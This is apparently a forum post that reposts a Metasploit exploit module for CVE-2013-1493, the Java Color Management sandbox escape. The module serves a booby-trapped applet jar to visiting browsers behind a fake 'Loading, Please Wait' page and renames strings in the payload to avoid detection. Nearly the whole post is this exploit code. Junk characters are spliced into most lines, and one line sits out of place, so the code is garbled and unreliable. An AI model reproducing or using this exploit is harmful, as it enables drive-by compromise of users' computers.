##
0 n2 c6 }2 Z& F' P9 J7 f( d5 c
/ T4 F. W" q0 s, I" M! j# This file is part of the Metasploit Framework and may be subject to" @' M x+ z8 @
# redistribution and commercial restrictions. Please see the Metasploit
7 A; | C5 F, O1 P# web site for more information on licensing and terms of use.0 {$ H, @! P& b: O% J
# http://metasploit.com/7 u4 a( e4 j J8 z. E3 j
##
' S0 V i3 `, z Arequire ‘msf/core’7 o; D$ l) x6 e6 w7 ?* ], s* V2 _' F
require ‘rex’2 I: f' A. b' i" b- e+ q. E
class Metasploit3 < Msf::Exploit::Remote" M, q# { e9 y# F% U" O
Rank = NormalRanking! t" `+ R2 B' p9 v& P5 K+ n( R
include Msf::Exploit::Remote::HttpServer::HTML
4 [3 C/ L5 n7 J/ J+ i* Linclude Msf::Exploit::EXE5 p8 I+ D |6 l* `
include Msf::Exploit::Remote::BrowserAutopwn
; T' S. v$ P4 j4 X9 i" Jautopwn_info({ :javascript => false })) a+ v5 l3 J( {. y+ w2 M) m6 o1 _6 A
def initialize( info = {} )
: R" F8 `1 J4 R5 L; @! _super( update_info( info,
* R8 F8 B0 g% X0 e4 A‘Name’ => ‘Java CMM Remote Code Execution’, |* N3 ~- X( W* \% Z- G
‘Description’ => %q{
7 q0 }4 n, m) Q+ jThis module abuses the Color Management classes from a Java Applet to run
. R- p9 _+ _. }1 \6 ]: f; O3 Garbitrary Java code outside of the sandbox as exploited in the wild in February
% [& u9 C& V* U4 O6 cand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
- N/ Z! H6 J9 Y. `: `. y$ Y& wand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP11 K0 h, N; s- f) I1 V, i( C
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
2 x# Q9 x" j7 n8 x, z5 fwarning in order to run the malicious applet.- o1 T7 n2 l) B
},
6 C) A4 C9 ~$ `$ a5 U1 Q‘License’ => MSF_LICENSE,
; c# p2 E# K, c9 u$ x‘Author’ =>2 j) ~4 E3 M0 M; p# q
'Unknown', # Vulnerability discovery and Exploit
7 N4 V9 Z3 H5 I( ~; K'juan vazquez' # Metasploit module (just ported the published exploit)
( _ l! s4 w0 X: r, s],
& H2 B; A9 q* R% Z‘References’ =>( w8 b& K/ N8 f6 D9 M( R j4 B
[1 A. |- i; V0 G, l6 T0 y0 \( D
[ 'CVE', '2013-1493' ],
8 K$ B- F% I1 a2 P( s$ S: ~# s[ 'OSVDB', '90737' ],
! D8 J4 j8 c% v. q; K[ 'BID', '58238' ],
3 _6 O! b8 ^7 _2 [[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],6 j% j1 `2 ~9 [7 y
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],7 T( s2 x/ R5 w/ t s
[ 'URL', 'http://pastie.org/pastes/6581034' ]
, S0 z# M* E/ H' ^3 Q) R1 u( x],
0 i% g! f: S6 F, A/ Z( D‘Platform’ => [ 'win', 'java' ],+ \% E) ?% [$ y) d& c* D3 E" E
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
: \/ O# {8 \: o3 B/ o‘Targets’ =>
# n& C0 X v9 x[5 F! O; X" T5 a, I% U6 o R* z# D
[ 'Generic (Java Payload)',
) E1 K0 o8 K3 }9 `7 d{0 O% M# Y! V" g8 `9 k7 a
'Platform' => 'java', y4 Q" t% q& u+ P
'Arch' => ARCH_JAVA; Z/ ?% M- Y' ?9 ~6 S
}4 b$ K" \4 x- r; @+ Z o0 g
],
! i, `8 R, @) ^2 H' J* b" D[ 'Windows x86 (Native Payload)',
; r% a- X4 U2 i5 y0 A{, S3 {0 [8 I( [9 d q- D
'Platform' => 'win',
. M) G9 w; O! ]$ ^2 c' h P'Arch' => ARCH_X86
! p! v$ }! Y8 @9 P5 {: B/ S9 y3 Y! e}4 v' W9 v, r+ p7 x$ x* }9 K5 L
]
0 P2 ]4 ^" w9 k9 Z$ B+ Y],
$ U/ B R" u4 T1 P0 S4 ^2 b4 }‘‘DisclosureDate’ => ‘Mar 01 2013′! k7 C1 i4 Q0 D: M: u
))# \- N7 a7 n7 j# p+ x4 I
end! b. s( ?' \' }4 i$ H) ]
def setup& Y7 t' L4 N$ f. o/ r# }+ E2 x
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)+ m9 P# c' j( `, E' W
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
* j* v! y# G" O7 z, M/ ~" qpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
3 M3 o* S$ g/ i+ B1 P- V: F+ j/ t# W@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
* h6 s* s) f' l; ~/ q3 epath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)& K. D- \) P" @: N7 \' E
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }; {$ T5 C, E0 ^, }+ d5 \- y
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
/ f; [+ z3 A9 W3 _/ ]/ }@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
# t6 [6 `! A; M P6 w" y! Q@init_class_name = rand_text_alpha(“Init”.length): ]' G; \2 m; U2 e# a' g
@init_class.gsub!(“Init”, @init_class_name)
0 c: W, g3 g, i( S9 ?1 @super
6 r, `* L3 M3 K' bend
8 v& N: h( _/ ~/ i3 n' |0 T8 ^def on_request_uri(cli, request)# F2 N+ v6 B' I
print_status(“handling request for #{request.uri}”)
, }6 ], z/ f; m) c0 f+ q* i4 A5 lcase request.uri/ }0 \9 `' P" M; @8 O4 k% _
when /\.jar$/i
4 D, Z5 C0 j2 x: C3 cjar = payload.encoded_jar
( F# \) ]5 Y) w6 u" O( gjar.add_file(“#{@init_class_name}.class”, @init_class)
, v4 d1 X c& V* Y5 X" Yjar.add_file(“Leak.class”, @leak_class)
$ d6 Z4 y: E9 C1 m7 wjar.add_file(“MyBufferedImage.class”, @buffered_image_class)0 i" U G" p0 @* J+ h+ Q1 ]
jar.add_file(“MyColorSpace.class”, @color_space_class)
& Y" N/ e$ Z) _# F4 }DefaultTarget’ => 1, M$ @' f* y$ l" L; N3 O
metasploit_str = rand_text_alpha(“metasploit”.length); a' j) @& U1 D) F* l
payload_str = rand_text_alpha(“payload”.length)5 C: W5 ]1 Q, h& e" V5 s
jar.entries.each { |entry|" u: c: [+ x- U1 B9 N9 W7 P
entry.name.gsub!(“metasploit”, metasploit_str)0 t8 L, x& k" F/ ] {4 }3 c
entry.name.gsub!(“Payload”, payload_str)$ |! T& W2 l/ \' k
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
8 ]9 a) P7 c) B! Y3 A D9 r+ O# Oentry.data = entry.data.gsub(“Payload”, payload_str)4 X! k* ^4 U" b) d7 J1 @
}
8 m5 M7 f$ g& g8 o/ Yjar.build_manifest
. a6 q+ B, W% B+ p5 D, V! e& K% d) jsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
6 z; ^4 \6 O+ Y. o/ e! C; B* v9 qwhen /\/$/' ^( Z, S4 x& ]! n7 J& C
payload = regenerate_payload(cli)
/ f4 K# T; y# Mif not payload
& g4 `6 S/ g; a1 x. w( aprint_error(“Failed to generate the payload.”); M; r4 y) i2 b: a# j% E: a3 D
send_not_found(cli)
. Q( {, L- G) S4 Z# kreturn% B' B9 l. N( U* g) l
end! e5 Y- s/ v& C% V
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
, y1 B/ z- R3 Y- Celse1 \0 i$ N. r9 P- r; ~
send_redirect(cli, get_resource() + ‘/’, ”)7 v5 u8 T: f7 p2 K
end$ L0 `0 [! m7 n" ?( ], {( C
end
7 Y% P; k( N' M! R) Q# z6 E6 sdef generate_html! D% }6 G3 s6 o& Y
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
1 u1 k5 C, j- Lhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
) T. }) ?2 D: Jhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|- I& a, r& x7 z: t6 h4 P9 N4 S6 u
html += %Q|</applet></body></html>|( C7 f- P: g* a/ G5 u
return html
! F$ H8 ?2 j2 i/ f7 F$ o `9 `end# @; H: R6 i7 X; v
end& h6 p9 W( u" B# F
end9 z+ q* W( e- G
|
发表于 2013-4-4 17:31:17
收藏
支持
反对